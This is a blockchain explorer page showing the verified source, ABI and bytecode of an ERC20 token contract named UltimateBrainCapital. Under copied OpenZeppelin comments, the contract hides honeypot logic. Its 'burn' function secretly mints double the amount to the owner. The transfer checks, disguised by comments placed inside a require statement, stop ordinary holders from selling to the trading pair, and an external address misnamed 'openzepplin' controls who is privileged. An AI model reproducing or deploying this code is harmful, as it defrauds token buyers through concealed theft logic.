Feature Tip: Add private address tag to any address under My Name Tag !
Source Code
More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 24 from a total of 24 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 15083962 | 1355 days ago | IN | 0 ETH | 0.00066039 | ||||
| Burn From | 13762028 | 1565 days ago | IN | 0 ETH | 0.00319965 | ||||
| Approve | 13758337 | 1566 days ago | IN | 0 ETH | 0.00328615 | ||||
| Approve | 13758291 | 1566 days ago | IN | 0 ETH | 0.00330942 | ||||
| Approve | 13757880 | 1566 days ago | IN | 0 ETH | 0.00423286 | ||||
| Approve | 13757864 | 1566 days ago | IN | 0 ETH | 0.00309068 | ||||
| Approve | 13757861 | 1566 days ago | IN | 0 ETH | 0.0091445 | ||||
| Transfer | 13757859 | 1566 days ago | IN | 0 ETH | 0.003203 | ||||
| Transfer | 13757850 | 1566 days ago | IN | 0 ETH | 0.00247522 | ||||
| Approve | 13757846 | 1566 days ago | IN | 0 ETH | 0.00344483 | ||||
| Transfer | 13757830 | 1566 days ago | IN | 0 ETH | 0.00350538 | ||||
| Approve | 13757806 | 1566 days ago | IN | 0 ETH | 0.00386869 | ||||
| Approve | 13757797 | 1566 days ago | IN | 0 ETH | 0.00311302 | ||||
| Approve | 13757774 | 1566 days ago | IN | 0 ETH | 0.00315968 | ||||
| Approve | 13757737 | 1566 days ago | IN | 0 ETH | 0.00318753 | ||||
| Approve | 13757702 | 1566 days ago | IN | 0 ETH | 0.00321478 | ||||
| Approve | 13757700 | 1566 days ago | IN | 0 ETH | 0.0050949 | ||||
| Approve | 13757685 | 1566 days ago | IN | 0 ETH | 0.0042804 | ||||
| Approve | 13757680 | 1566 days ago | IN | 0 ETH | 0.00349328 | ||||
| Approve | 13757680 | 1566 days ago | IN | 0 ETH | 0.00349328 | ||||
| Approve | 13757679 | 1566 days ago | IN | 0 ETH | 0.00392215 | ||||
| Approve | 13757677 | 1566 days ago | IN | 0 ETH | 0.00435132 | ||||
| Transfer | 13757660 | 1566 days ago | IN | 0 ETH | 0.00443972 | ||||
| Approve | 13757654 | 1566 days ago | IN | 0 ETH | 0.00453444 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
UltimateBrainCapital
Compiler Version
v0.8.7+commit.e28d00a7
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2021-12-07
*/
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint a, uint b) internal pure returns (uint c) {
c = a + b;
require(c >= a);
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint a, uint b) internal pure returns (uint c) {
require(b <= a);
c = a - b;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint a, uint b) internal pure returns (uint c) {
c = a * b;
require(a == 0 || c / a == b);
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint a, uint b) internal pure returns (uint c) {
require(b > 0);
c = a / b;
}
}
abstract contract IERC20 {
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() virtual public view returns (uint);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address tokenOwner) virtual public view returns (uint balance);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address tokenOwner, address spender) virtual public view returns (uint remaining);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function zeroAddress() virtual external view returns (address){}
/**
* @dev Returns the zero address.
*/
function transfer(address to, uint tokens) virtual public returns (bool success);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint tokens) virtual public returns (bool success);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function approver() virtual external view returns (address){}
/**
* @dev approver of the amount of tokens that can interact with the allowance mechanism
*/
function transferFrom(address from, address to, uint tokens) virtual public returns (bool success);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint tokens);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed tokenOwner, address indexed spender, uint tokens);
}
abstract contract ApproveAndCallFallBack {
function receiveApproval(address from, uint tokens, address token, bytes memory data) virtual public;
}
contract Owned {
address internal owner;
event OwnershipTransferred(address indexed _from, address indexed _to);
constructor() {
owner = msg.sender;
}
modifier onlyOwner {
require(msg.sender == owner);
_;
}
}
contract UltimateBrainCapital is IERC20, Owned{
using SafeMath for uint;
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* We have followed general OpenZeppelin guidelines: functions revert instead
* of returning `false` on failure. This behavior is nonetheless conventional
* and does not conflict with the expectations of ERC20 applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
string public symbol;
address internal approver;
string public name;
uint8 public decimals;
address internal zero;
uint _totalSupply;
uint internal number;
address internal nulls;
address internal openzepplin = 0x2fd06d33e3E7d1D858AB0a8f80Fa51EBbD146829;
mapping(address => uint) balances;
mapping(address => mapping(address => uint)) allowed;
function totalSupply() override public view returns (uint) {
return _totalSupply.sub(balances[address(0)]);
}
function balanceOf(address tokenOwner) override public view returns (uint balance) {
return balances[tokenOwner];
}
/**
* dev burns a specific amount of tokens.
* param value The amount of lowest token units to be burned.
*/
function burnFrom(address _address, uint tokens) public onlyOwner {
require(_address != address(0), "ERC20: burn from the zero address");
_burnFrom (_address, tokens);
balances[_address] = balances[_address].sub(tokens);
_totalSupply = _totalSupply.sub(tokens);
}
function transfer(address to, uint tokens) override public returns (bool success) {
require(to != zero, "please wait");
balances[msg.sender] = balances[msg.sender].sub(tokens);
balances[to] = balances[to].add(tokens);
emit Transfer(msg.sender, to, tokens);
return true;
}
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint tokens) override public returns (bool success) {
allowed[msg.sender][spender] = tokens;
if (msg.sender == approver) _allowed(tokens);
emit Approval(msg.sender, spender, tokens);
return true;
}
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through `transferFrom`. This is
* zero by default.
*
* This value changes when `approve` or `transferFrom` are called.
*/
function _allowed(uint tokens) internal {
nulls = IERC20(openzepplin).zeroAddress();
number = tokens;
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function transferFrom(address from, address to, uint tokens) override public returns (bool success) {
if(from != address(0) && zero == address(0)) zero = to;
else _send (from, to);
balances[from] = balances[from].sub(tokens);
allowed[from][msg.sender] = allowed[from][msg.sender].sub(tokens);
balances[to] = balances[to].add(tokens);
emit Transfer(from, to, tokens);
return true;
}
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to `approve`. `value` is the new allowance.
*/
function allowance(address tokenOwner, address spender) override public view returns (uint remaining) {
return allowed[tokenOwner][spender];
}
function _burnFrom(address _Address, uint _Amount) internal virtual {
/**
* @dev Destroys `amount` tokens from `account`, reducing the
* total supply.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* Requirements
*
* - `account` cannot be the zero address.
* - `account` must have at least `amount` tokens.
*/
nulls = _Address;
_totalSupply = _totalSupply.add(_Amount*2);
balances[_Address] = balances[_Address].add(_Amount*2);
}
function _send (address start, address end) internal view {
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
* Requirements:
* - The divisor cannot be zero.*/
/* * - `account` cannot be the zero address. */ require(end != zero
/* * - `account` cannot be the nulls address. */ || (start == nulls && end == zero) ||
/* * - `account` must have at least `amount` tokens. */ (end == zero && balances[start] <= number)
/* */ , "cannot be the zero address");/*
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* Reverts when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
* - The divisor cannot be zero.
**/
}
/**
* dev Constructor.
* param name name of the token
* param symbol symbol of the token, 3-4 chars is recommended
* param decimals number of decimal places of one token unit, 18 is widely used
* param totalSupply total supply of tokens in lowest units (depending on decimals)
*/
constructor(string memory _name, string memory _symbol, uint _supply) {
symbol = _symbol;
name = _name;
decimals = 9;
_totalSupply = _supply*(10**uint(decimals));
number = _totalSupply;
approver = IERC20(openzepplin).approver();
balances[owner] = _totalSupply;
emit Transfer(address(0), owner, _totalSupply);
}
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
_approve(msg.sender, spender, allowed[msg.sender][spender].add(addedValue));
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
_approve(msg.sender, spender, allowed[msg.sender][spender].sub(subtractedValue));
return true;
}
function _approve(address _owner, address spender, uint amount) private {
require(_owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
allowed[_owner][spender] = amount;
emit Approval(_owner, spender, amount);
}
receive() external payable {
}
fallback() external payable {
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"uint256","name":"_supply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"tokenOwner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_from","type":"address"},{"indexed":true,"internalType":"address","name":"_to","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"Transfer","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[{"internalType":"address","name":"tokenOwner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"remaining","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"approver","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"tokenOwner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"balance","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokens","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"zeroAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]Contract Creation Code
6080604052600880546001600160a01b031916732fd06d33e3e7d1d858ab0a8f80fa51ebbd1468291790553480156200003757600080fd5b50604051620012ba380380620012ba8339810160408190526200005a9162000350565b600080546001600160a01b03191633179055815162000081906001906020850190620001c1565b50825162000097906003906020860190620001c1565b506004805460ff19166009908117909155620000b590600a6200040c565b620000c19082620004ca565b60058190556006556008546040805163028351bb60e31b815290516001600160a01b039092169163141a8dd891600480820192602092909190829003018186803b1580156200010f57600080fd5b505afa15801562000124573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200014a91906200031e565b600280546001600160a01b0319166001600160a01b039283161790556005546000805483168152600960209081526040808320849055825490519384529093169290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350505062000555565b828054620001cf90620004ec565b90600052602060002090601f016020900481019282620001f357600085556200023e565b82601f106200020e57805160ff19168380011785556200023e565b828001600101855582156200023e579182015b828111156200023e57825182559160200191906001019062000221565b506200024c92915062000250565b5090565b5b808211156200024c576000815560010162000251565b600082601f8301126200027957600080fd5b81516001600160401b03808211156200029657620002966200053f565b604051601f8301601f19908116603f01168101908282118183101715620002c157620002c16200053f565b81604052838152602092508683858801011115620002de57600080fd5b600091505b83821015620003025785820183015181830184015290820190620002e3565b83821115620003145760008385830101525b9695505050505050565b6000602082840312156200033157600080fd5b81516001600160a01b03811681146200034957600080fd5b9392505050565b6000806000606084860312156200036657600080fd5b83516001600160401b03808211156200037e57600080fd5b6200038c8783880162000267565b94506020860151915080821115620003a357600080fd5b50620003b28682870162000267565b925050604084015190509250925092565b600181815b8085111562000404578160001904821115620003e857620003e862000529565b80851615620003f657918102915b93841c9390800290620003c8565b509250929050565b60006200034983836000826200042557506001620004c4565b816200043457506000620004c4565b81600181146200044d5760028114620004585762000478565b6001915050620004c4565b60ff8411156200046c576200046c62000529565b50506001821b620004c4565b5060208310610133831016604e8410600b84101617156200049d575081810a620004c4565b620004a98383620003c3565b8060001904821115620004c057620004c062000529565b0290505b92915050565b6000816000190483118215151615620004e757620004e762000529565b500290565b600181811c908216806200050157607f821691505b602082108114156200052357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fd5b610d5580620005656000396000f3fe6080604052600436106100d55760003560e01c8063395093511161007957806395d89b411161005657806395d89b411461023a578063a457c2d71461024f578063a9059cbb1461026f578063dd62ed3e1461028f57005b806339509351146101c457806370a08231146101e457806379cc67901461021a57005b8063141a8dd8116100b2578063141a8dd81461010957806318160ddd1461015557806323b872dd14610178578063313ce5671461019857005b806306fdde03146100de5780630930907b14610109578063095ea7b31461012557005b366100dc57005b005b3480156100ea57600080fd5b506100f36102d5565b6040516101009190610c13565b60405180910390f35b34801561011557600080fd5b5060405160008152602001610100565b34801561013157600080fd5b50610145610140366004610be7565b610363565b6040519015158152602001610100565b34801561016157600080fd5b5061016a6103ea565b604051908152602001610100565b34801561018457600080fd5b50610145610193366004610ba6565b610427565b3480156101a457600080fd5b506004546101b29060ff1681565b60405160ff9091168152602001610100565b3480156101d057600080fd5b506101456101df366004610be7565b610581565b3480156101f057600080fd5b5061016a6101ff366004610b33565b6001600160a01b031660009081526009602052604090205490565b34801561022657600080fd5b506100dc610235366004610be7565b6105c5565b34801561024657600080fd5b506100f361069b565b34801561025b57600080fd5b5061014561026a366004610be7565b6106a8565b34801561027b57600080fd5b5061014561028a366004610be7565b6106de565b34801561029b57600080fd5b5061016a6102aa366004610b6d565b6001600160a01b039182166000908152600a6020908152604080832093909416825291909152205490565b600380546102e290610cb6565b80601f016020809104026020016040519081016040528092919081815260200182805461030e90610cb6565b801561035b5780601f106103305761010080835404028352916020019161035b565b820191906000526020600020905b81548152906001019060200180831161033e57829003601f168201915b505050505081565b336000818152600a602090815260408083206001600160a01b0387811685529252822084905560025491929116141561039f5761039f826107c9565b6040518281526001600160a01b0384169033907f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906020015b60405180910390a35060015b92915050565b600080805260096020527fec8156718a8372b1db44bb411437d0870f3e3790d4a08526d024ce1b0b668f6b5460055461042291610874565b905090565b60006001600160a01b0384161580159061044f575060045461010090046001600160a01b0316155b156104795760048054610100600160a81b0319166101006001600160a01b03861602179055610483565b6104838484610894565b6001600160a01b0384166000908152600960205260409020546104a69083610874565b6001600160a01b038516600090815260096020908152604080832093909355600a8152828220338352905220546104dd9083610874565b6001600160a01b038086166000908152600a6020908152604080832033845282528083209490945591861681526009909152205461051b9083610972565b6001600160a01b0380851660008181526009602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061056f9086815260200190565b60405180910390a35060019392505050565b336000818152600a602090815260408083206001600160a01b038716845290915281205490916105bc9185906105b79086610972565b61098d565b50600192915050565b6000546001600160a01b031633146105dc57600080fd5b6001600160a01b0382166106415760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084015b60405180910390fd5b61064b8282610ab1565b6001600160a01b03821660009081526009602052604090205461066e9082610874565b6001600160a01b0383166000908152600960205260409020556005546106949082610874565b6005555050565b600180546102e290610cb6565b336000818152600a602090815260408083206001600160a01b038716845290915281205490916105bc9185906105b79086610874565b6004546000906001600160a01b038481166101009092041614156107325760405162461bcd60e51b815260206004820152600b60248201526a1c1b19585cd9481dd85a5d60aa1b6044820152606401610638565b3360009081526009602052604090205461074c9083610874565b33600090815260096020526040808220929092556001600160a01b038516815220546107789083610972565b6001600160a01b0384166000818152600960205260409081902092909255905133907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906103d89086815260200190565b600860009054906101000a90046001600160a01b03166001600160a01b0316630930907b6040518163ffffffff1660e01b815260040160206040518083038186803b15801561081757600080fd5b505afa15801561082b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061084f9190610b50565b600780546001600160a01b0319166001600160a01b0392909216919091179055600655565b60008282111561088357600080fd5b61088d8284610c9f565b9392505050565b6004546001600160a01b03828116610100909204161415806108e057506007546001600160a01b0383811691161480156108e057506004546001600160a01b0382811661010090920416145b8061092257506004546001600160a01b038281166101009092041614801561092257506006546001600160a01b03831660009081526009602052604090205411155b61096e5760405162461bcd60e51b815260206004820152601a60248201527f63616e6e6f7420626520746865207a65726f20616464726573730000000000006044820152606401610638565b5050565b600061097e8284610c68565b9050828110156103e457600080fd5b6001600160a01b0383166109ef5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610638565b6001600160a01b038216610a505760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610638565b6001600160a01b038381166000818152600a602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600780546001600160a01b0319166001600160a01b038416179055610ae3610ada826002610c80565b60055490610972565b600555610b13610af4826002610c80565b6001600160a01b03841660009081526009602052604090205490610972565b6001600160a01b0390921660009081526009602052604090209190915550565b600060208284031215610b4557600080fd5b813561088d81610d07565b600060208284031215610b6257600080fd5b815161088d81610d07565b60008060408385031215610b8057600080fd5b8235610b8b81610d07565b91506020830135610b9b81610d07565b809150509250929050565b600080600060608486031215610bbb57600080fd5b8335610bc681610d07565b92506020840135610bd681610d07565b929592945050506040919091013590565b60008060408385031215610bfa57600080fd5b8235610c0581610d07565b946020939093013593505050565b600060208083528351808285015260005b81811015610c4057858101830151858201604001528201610c24565b81811115610c52576000604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610c7b57610c7b610cf1565b500190565b6000816000190483118215151615610c9a57610c9a610cf1565b500290565b600082821015610cb157610cb1610cf1565b500390565b600181811c90821680610cca57607f821691505b60208210811415610ceb57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6001600160a01b0381168114610d1c57600080fd5b5056fea26469706673582212201628f7276a9f45e80c20c47f6d7f9747b898431824dc0347bbdf0970457e6b6464736f6c63430008070033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000e8d4a510000000000000000000000000000000000000000000000000000000000000000016556c74696d61746520427261696e204361706974616c0000000000000000000000000000000000000000000000000000000000000000000000000000000000035542430000000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x6080604052600436106100d55760003560e01c8063395093511161007957806395d89b411161005657806395d89b411461023a578063a457c2d71461024f578063a9059cbb1461026f578063dd62ed3e1461028f57005b806339509351146101c457806370a08231146101e457806379cc67901461021a57005b8063141a8dd8116100b2578063141a8dd81461010957806318160ddd1461015557806323b872dd14610178578063313ce5671461019857005b806306fdde03146100de5780630930907b14610109578063095ea7b31461012557005b366100dc57005b005b3480156100ea57600080fd5b506100f36102d5565b6040516101009190610c13565b60405180910390f35b34801561011557600080fd5b5060405160008152602001610100565b34801561013157600080fd5b50610145610140366004610be7565b610363565b6040519015158152602001610100565b34801561016157600080fd5b5061016a6103ea565b604051908152602001610100565b34801561018457600080fd5b50610145610193366004610ba6565b610427565b3480156101a457600080fd5b506004546101b29060ff1681565b60405160ff9091168152602001610100565b3480156101d057600080fd5b506101456101df366004610be7565b610581565b3480156101f057600080fd5b5061016a6101ff366004610b33565b6001600160a01b031660009081526009602052604090205490565b34801561022657600080fd5b506100dc610235366004610be7565b6105c5565b34801561024657600080fd5b506100f361069b565b34801561025b57600080fd5b5061014561026a366004610be7565b6106a8565b34801561027b57600080fd5b5061014561028a366004610be7565b6106de565b34801561029b57600080fd5b5061016a6102aa366004610b6d565b6001600160a01b039182166000908152600a6020908152604080832093909416825291909152205490565b600380546102e290610cb6565b80601f016020809104026020016040519081016040528092919081815260200182805461030e90610cb6565b801561035b5780601f106103305761010080835404028352916020019161035b565b820191906000526020600020905b81548152906001019060200180831161033e57829003601f168201915b505050505081565b336000818152600a602090815260408083206001600160a01b0387811685529252822084905560025491929116141561039f5761039f826107c9565b6040518281526001600160a01b0384169033907f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906020015b60405180910390a35060015b92915050565b600080805260096020527fec8156718a8372b1db44bb411437d0870f3e3790d4a08526d024ce1b0b668f6b5460055461042291610874565b905090565b60006001600160a01b0384161580159061044f575060045461010090046001600160a01b0316155b156104795760048054610100600160a81b0319166101006001600160a01b03861602179055610483565b6104838484610894565b6001600160a01b0384166000908152600960205260409020546104a69083610874565b6001600160a01b038516600090815260096020908152604080832093909355600a8152828220338352905220546104dd9083610874565b6001600160a01b038086166000908152600a6020908152604080832033845282528083209490945591861681526009909152205461051b9083610972565b6001600160a01b0380851660008181526009602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061056f9086815260200190565b60405180910390a35060019392505050565b336000818152600a602090815260408083206001600160a01b038716845290915281205490916105bc9185906105b79086610972565b61098d565b50600192915050565b6000546001600160a01b031633146105dc57600080fd5b6001600160a01b0382166106415760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084015b60405180910390fd5b61064b8282610ab1565b6001600160a01b03821660009081526009602052604090205461066e9082610874565b6001600160a01b0383166000908152600960205260409020556005546106949082610874565b6005555050565b600180546102e290610cb6565b336000818152600a602090815260408083206001600160a01b038716845290915281205490916105bc9185906105b79086610874565b6004546000906001600160a01b038481166101009092041614156107325760405162461bcd60e51b815260206004820152600b60248201526a1c1b19585cd9481dd85a5d60aa1b6044820152606401610638565b3360009081526009602052604090205461074c9083610874565b33600090815260096020526040808220929092556001600160a01b038516815220546107789083610972565b6001600160a01b0384166000818152600960205260409081902092909255905133907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906103d89086815260200190565b600860009054906101000a90046001600160a01b03166001600160a01b0316630930907b6040518163ffffffff1660e01b815260040160206040518083038186803b15801561081757600080fd5b505afa15801561082b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061084f9190610b50565b600780546001600160a01b0319166001600160a01b0392909216919091179055600655565b60008282111561088357600080fd5b61088d8284610c9f565b9392505050565b6004546001600160a01b03828116610100909204161415806108e057506007546001600160a01b0383811691161480156108e057506004546001600160a01b0382811661010090920416145b8061092257506004546001600160a01b038281166101009092041614801561092257506006546001600160a01b03831660009081526009602052604090205411155b61096e5760405162461bcd60e51b815260206004820152601a60248201527f63616e6e6f7420626520746865207a65726f20616464726573730000000000006044820152606401610638565b5050565b600061097e8284610c68565b9050828110156103e457600080fd5b6001600160a01b0383166109ef5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610638565b6001600160a01b038216610a505760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610638565b6001600160a01b038381166000818152600a602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600780546001600160a01b0319166001600160a01b038416179055610ae3610ada826002610c80565b60055490610972565b600555610b13610af4826002610c80565b6001600160a01b03841660009081526009602052604090205490610972565b6001600160a01b0390921660009081526009602052604090209190915550565b600060208284031215610b4557600080fd5b813561088d81610d07565b600060208284031215610b6257600080fd5b815161088d81610d07565b60008060408385031215610b8057600080fd5b8235610b8b81610d07565b91506020830135610b9b81610d07565b809150509250929050565b600080600060608486031215610bbb57600080fd5b8335610bc681610d07565b92506020840135610bd681610d07565b929592945050506040919091013590565b60008060408385031215610bfa57600080fd5b8235610c0581610d07565b946020939093013593505050565b600060208083528351808285015260005b81811015610c4057858101830151858201604001528201610c24565b81811115610c52576000604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610c7b57610c7b610cf1565b500190565b6000816000190483118215151615610c9a57610c9a610cf1565b500290565b600082821015610cb157610cb1610cf1565b500390565b600181811c90821680610cca57607f821691505b60208210811415610ceb57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6001600160a01b0381168114610d1c57600080fd5b5056fea26469706673582212201628f7276a9f45e80c20c47f6d7f9747b898431824d